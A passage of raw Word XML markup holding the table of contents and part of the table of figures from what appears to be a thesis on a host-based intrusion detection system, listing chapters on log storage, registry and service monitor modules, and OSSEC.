            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963007" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963007 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963008" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CLSS Architecture</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963008 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963009" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CLSS Workflows</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963009 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963010" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 4.</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IMPLEMENTATION</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963010 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963011" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APTIDS</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963011 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963012" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Registry Monitor module’s source code</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963012 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963013" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service Monitor Module’s source code</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963013 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484963014" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Log Module function</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484963014 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="000C0B89" w:rsidRDefault="000C0B89">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="008F0F14">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB2F32" w:rsidRPr="00FB2F32" w:rsidRDefault="00FB2F32" w:rsidP="00FB2F32">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F32">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF FIGURES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB2F32" w:rsidRDefault="00FB2F32" w:rsidP="00FB2F32">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00FB2F32">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc484886341" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.1: OSSEC Processes in a “Server-Agent” Installation</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886341 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886342" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.2 Cell data type segments in Registry hive.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886342 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886343" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.3 Example of cell indexes</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886343 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
